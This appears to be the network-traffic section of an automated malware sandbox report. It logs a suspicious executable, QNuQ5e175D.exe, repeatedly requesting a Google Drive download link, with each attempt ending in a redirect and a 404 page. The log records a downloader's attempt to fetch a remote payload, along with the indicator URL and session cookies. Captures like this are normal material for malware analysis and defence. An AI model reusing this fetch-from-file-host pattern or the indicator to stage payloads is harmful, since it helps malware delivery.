                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-nBZbLe45NRVS_eqPGpPZ1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 62 72 7a 36 44 49 6c 56 75 4e 6d 54 73 64 66 58 36 4d 64 73 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jbrz6DIlVuNmTsdfX6Mdsg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.1149888172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:05 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:06 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:05 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-mo6H5axHd-m66avLdY27EQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.1149899142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:06 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:07 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgSz4JJ8K40AwlCuQSzhm6caGWtikNTIeyWkUYW7zGpeC5SgjT1D6Cx_r_j1CAEmdpAn
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:07 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-QIqOKJo2_cz0vSGF6AadGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 69 76 52 36 36 68 6b 44 37 4c 6c 63 49 72 34 70 76 73 36 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SivR66hkD7LlcIr4pvs6Og">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.1149909172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:08 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:08 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:08 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-tl3kSo0rUTKe4bzGUR9mug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.1149916142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:09 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:09 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQrxNivytgpzIfroY0Km0Oa-BzAOcmlbaiJ6dQpGvoHB-7qR2ZBjmn_jV5K9UWPgTJnpKoelQM
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:09 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-S6Tnd-aNAsf65K3p4SIduw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 72 37 79 4c 67 64 6d 73 37 65 61 63 45 43 57 39 33 35 68 71 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Vr7yLgdms7eacECW935hqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.1149926172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:10 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:10 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:10 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Hm3dRt2X4ZSbp7pNa2EIgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.1149933142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:11 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:11 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQevJy5pKGLnkINqKLQFJTEPMiQDZdVwHbAHIDueYLep5wA6a4z1sJPHn2X-0Z8kSTz
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:11 GMT
                                                      Content-Security-Policy: script-src 'nonce-gQ62IfalAGZa63GOZV9y4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 5a 77 66 55 6f 71 45 6b 30 70 46 2d 6f 31 58 32 6c 36 70 78 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pZwfUoqEk0pF-o1X2l6pxg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.1149943172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:12 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:13 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:12 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-NwbcgAi-ECTgEZvn6RWzHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


